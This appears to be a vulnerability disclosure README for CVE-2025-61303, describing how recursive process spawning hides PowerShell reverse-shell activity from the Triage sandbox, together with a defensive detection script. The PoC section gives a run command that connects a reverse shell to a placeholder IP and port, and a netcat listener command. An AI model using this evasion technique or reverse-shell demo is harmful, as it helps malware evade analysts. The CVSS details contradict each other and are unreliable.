POC details: 527156e54babec26befd9b03804e5b87fadba629

Source
Related vulnerability
Title: Recorded Future Triage security vulnerability (CVE-2025-61303)
Description: Recorded Future Triage is a cloud sandbox service from the US company Recorded Future. Recorded Future Triage contains a security vulnerability: its Windows behavioral analysis engine allows a malicious sample to evade detection by recursively spawning a large number of child processes, which can lead to denial of analysis and misleading analysis results.
Description
RecordedFuture Triage dynamic analysis engine can fail to record malicious behavior when samples produce very high-volume recursive process forking, causing inconsistent or missing behavioral reports.
Introduction
# CVE-2025-61303 - RecordedFuture Triage: Denial-Of-Analysis via Recursive Process Forking


## Description
The RecordedFuture Triage sandbox images for Windows 10 build 2004 and Windows 10 LTSC 2021 contain a vulnerability in the Windows behavioral analysis engine that allows a submitted malware sample to evade detection and cause **denial-of-analysis**. The vulnerability is triggered when a sample recursively spawns a large number of child processes, generating high log volume and exhausting system resources. As a result, key malicious behavior, including PowerShell execution and reverse-shell activity, may not be recorded or reported, misleading analysts and compromising the integrity and availability of sandboxed analysis results.

---

## Authors / Researchers

- **Evgenios Gkritsis** — Department of Informatics, Athens University of Economics and Business, Greece  
- **Constantinos Patsakis** — Department of Informatics, University of Piraeus, Greece  
- **George Stergiopoulos** — Department of Informatics, Athens University of Economics and Business, Greece

---

## Details

The sample `vathos_rev.exe` (SHA256: `3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b`) demonstrates a **denial-of-analysis** condition in RecordedFuture Triage’s Windows behavioral analysis engine.  
When detonated under Windows 10 configurations, the sample recursively spawns thousands of child processes, exhausting process-tracking and logging resources. As a result, the sandbox reports minimal behavioral data and fails to record key malicious actions.

---

### Windows 10 v2004 Environment

- **Platform:** `win10v2004-20250610-en`  
- **Architecture:** `x64`  
- **Max time kernel:** `104s`  
- **Max time network:** `213s`  
- **Reported behavioral score:** `1/10`  
- **Detected signature:** “Suspicious use of WriteProcessMemory” (64 IoCs)  
- **Observed behavior:**  
  - Continuous process recursion of `vathos_rev.exe`  
  - No PowerShell execution or reverse-shell activity recorded  
  - Limited network traffic (only standard DNS and HTTP requests)  
  - No C2 callbacks or payload telemetry captured  

---

### Windows 10 LTSC 2021 Environment

- **Platform:** `win10ltsc2021-20250619-en`  
- **Architecture:** `x64`  
- **Max time kernel:** `105s`  
- **Max time network:** `215s`  
- **Reported behavioral score:** `1/10`  
- **Detected signature:** “Suspicious use of WriteProcessMemory” (64 IoCs)  
- **Observed process activity:**  
  - Continuous process recursion of `vathos_rev.exe`  
  - No PowerShell execution or reverse-shell activity recorded  
  - Limited network traffic (only standard DNS and HTTP requests)  
  - No C2 callbacks or payload telemetry captured  

Across both Windows 10 sandbox environments, the detonation failed to capture the expected PowerShell execution and reverse-shell stages, even though the malware executed these behaviors on the host.

The sandbox's behavioral analysis engine became saturated by recursive process spawning, resulting in truncated or missing telemetry.

This confirms a **denial-of-analysis** vulnerability: under high recursion and log volume the behavioral engine fails to report malicious activity, leading to false negatives and incomplete forensic output.
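A triage-side check for the failure mode described above, added here as an example and not part of the advisory or of Triage's own code: it scans a flat process list of the kind a sandbox exports, measures how deeply one image spawns itself, and refuses to accept a low score as "benign" when the log is full of such recursion. The record field names, the log cap of 64 entries and the depth threshold are assumptions for the example.

```python
from collections import defaultdict

# Assumed number of process records the sandbox log keeps before truncating
# (constructed value; the advisory does not state the real cap).
PROCESS_LOG_CAP = 64


def self_spawn_depths(procs):
    """For each pid, the length of the chain of same-image ancestors ending at it."""
    by_pid = {p["pid"]: p for p in procs}
    depths = {}
    for p in procs:
        chain, cur = 1, by_pid.get(p["ppid"])
        while cur is not None and cur["image"] == p["image"]:
            chain += 1
            cur = by_pid.get(cur["ppid"])
        depths[p["pid"]] = chain
    return depths


def assess_report(procs, score, cap=PROCESS_LOG_CAP, min_depth=3):
    """Mark a report 'inconclusive' when the process log is full (>= cap) and
    dominated by one image recursively spawning itself: later stages (PowerShell,
    network) may simply have gone unrecorded, so a low score proves nothing."""
    per_image = defaultdict(int)
    for p in procs:
        per_image[p["image"]] += 1
    top_image, top_count = max(per_image.items(), key=lambda kv: kv[1])
    max_depth = max(self_spawn_depths(procs).values())
    saturated = len(procs) >= cap
    recursive = max_depth >= min_depth and top_count * 2 >= len(procs)
    if saturated and recursive:
        verdict = "inconclusive"
    elif score <= 1:
        verdict = "benign"
    else:
        verdict = "suspicious"
    return {"verdict": verdict, "processes": len(procs), "top_image": top_image,
            "top_image_count": top_count, "max_self_spawn_depth": max_depth,
            "log_saturated": saturated}


def constructed_log(generations):
    """Constructed sample: explorer.exe starts vathos_rev.exe, which then respawns
    itself in a chain, mirroring the recursion seen in the reports above."""
    procs = [{"pid": 1000, "ppid": 4, "image": "explorer.exe"}]
    ppid = 1000
    for i in range(generations):
        procs.append({"pid": 2000 + i, "ppid": ppid, "image": "vathos_rev.exe"})
        ppid = 2000 + i
    return procs


if __name__ == "__main__":
    print(assess_report(constructed_log(64), score=1))   # full log, deep recursion
    print(assess_report(constructed_log(10), score=1))   # short chain, log not full
```

With the 64-generation log and a score of 1 the verdict is "inconclusive"; the same score on a 10-generation log stays "benign" because the log never filled up.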

**Public report reference:**  
https://tria.ge/250822-qfystshk51

---

## Impact
This is a **denial-of-analysis** vulnerability in RecordedFuture Triage that can cause the dynamic analysis engine to fail to capture or report behavioral activity. Exploitation allows adversaries to bypass behavioral detection and produce incomplete or missing analysis reports.

**Key impacts**
- **Detection Evasion:** Malicious behavior may be unrecorded, causing threats to appear benign.  
- **False Confidence:** Low-scored analyses with missing telemetry can mislead analysts.  
- **Reusable Evasion:** Technique can be embedded in loaders/droppers and reused across campaigns.  
- **Ease of Exploitation:** Reproducible without deep expertise, increasing risk for mass abuse.

**Downstream consequences**
- Missed IOCs  
- Misclassification of advanced threats  
- Incomplete forensic timelines

---

## Affected Products
- **Product:** RecordedFuture Triage (Dynamic Analysis Platform)  
- **Affected Component:** Windows Behavioral Analysis Engine  
- **Malware Sample:** `vathos_rev.exe`  
  - **SHA256:** `3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b`  
  - **MD5:** `dca2fc8f69f6493c7a9c1ce9a68b2454`  
  - **SHA1:** `9b4688ba4788e34bce47d91b0accc98d33dbf8d2`  
  - **SHA512:** `924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b`  
  - **Size:** `270 KB`

### Observed Vulnerable Detonations (Public Triage Reports)
#### Windows 10 LTSC 2021 Environment
- **Report ID:** [`250822-qfystshk51`](https://tria.ge/250822-qfystshk51/behavioral2)  
- **Platform:** `win10ltsc2021-20250619-en`  
- **Architecture:** `x64`  
- **Submitted:** `2025-08-22 13:12 UTC`  
- **Reported:** `2025-08-22 13:18 UTC`

#### Windows 10 Version 2004 Environment
- **Report ID:** [`250822-qfystshk51`](https://tria.ge/250822-qfystshk51/behavioral1)  
- **Platform:** `win10v2004-20250610-en`  
- **Architecture:** `x64`  
- **Submitted:** `2025-08-22 13:12 UTC`  
- **Reported:** `2025-08-22 13:18 UTC`

> **Note:** Engine build and internal version details are not publicly exposed by RecordedFuture.  
> All observations are based on reproducible public detonations from RecordedFuture’s Triage platform (submission `250822-qfystshk51`).

---

## Proof Of Concept (PoC)

### Summary (brief)
The supplied demo reproduces the denial-of-analysis (DoA) condition by generating very high process volume and deeply nested runtime activity. The demo spawns many child processes and performs multi-round XOR decryption before a final PowerShell reverse-shell stage. In vulnerable Triage Windows 10 images the final payload stage is not recorded or is truncated, while other images (e.g., Windows 11) capture the full behavior.

**How to run**

```bash
poc/vathos_demo.exe <IP> <PORT>
```

Start a listener (e.g., `nc -lvp 4444`) on the specified IP/port to observe attempted connections. The demo spawns a very high number of processes and performs multi-round XOR decryption, culminating in a PowerShell reverse-shell stage. In affected Triage configurations the final payload stage may not be recorded despite the sample executing it on the host.

Figure 1 - Triage overview dashboard
![Figure 1 - Triage overview dashboard](screenshots/triage-01.png)

Figure 2 - Windows 10 v2004 behavioral report (minimal telemetry / DoA example)
![Figure 2 - win10 v2004 report (minimal telemetry)](screenshots/triage-02.png)

Figure 3 - Windows 10 LTSC 2021 behavioral report (minimal telemetry / DoA example)
![Figure 3 — win10 LTSC 2021 report (minimal telemetry)](screenshots/triage-03.png)

Figure 4 - Example processes logged in Windows 10 LTSC (sanitized, *not all* processes logged) — analysis logs → Processes
![Figure 4 - processes logged in win10 LTSC (sanitized)](screenshots/triage-04.png)


---

## Severity

Assessed with **CVSS v3.1**:

- **Attack Vector:** Local  
- **Attack Complexity:** Low  
- **Privileges Required:** Low  
- **User Interaction:** None  
- **Scope:** Unchanged  
- **Confidentiality:** None 
- **Integrity:** None
- **Availability:** Low

**Estimated CVSS v3.1 vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`  
**Estimated base score:** **4.0 (Medium)**

---

## References

- Public Triage analysis: https://tria.ge/250822-qfystshk51

---

File snapshot

```text
[4.0K] /data/pocs/527156e54babec26befd9b03804e5b87fadba629
├── [4.0K] poc
│   ├── [ 456] details.txt
│   ├── [2.1K] encrypt.py
│   ├── [2.6K] onion.c
│   └── [243K] vathos_demo.exe
├── [7.4K] README.md
├── [4.0K] screenshots
│   ├── [ 97K] triage-01.png
│   ├── [135K] triage-02.png
│   ├── [137K] triage-03.png
│   └── [134K] triage-04.png
└── [464K] triage-report-250822-qfystshk51.pdf

2 directories, 10 files
```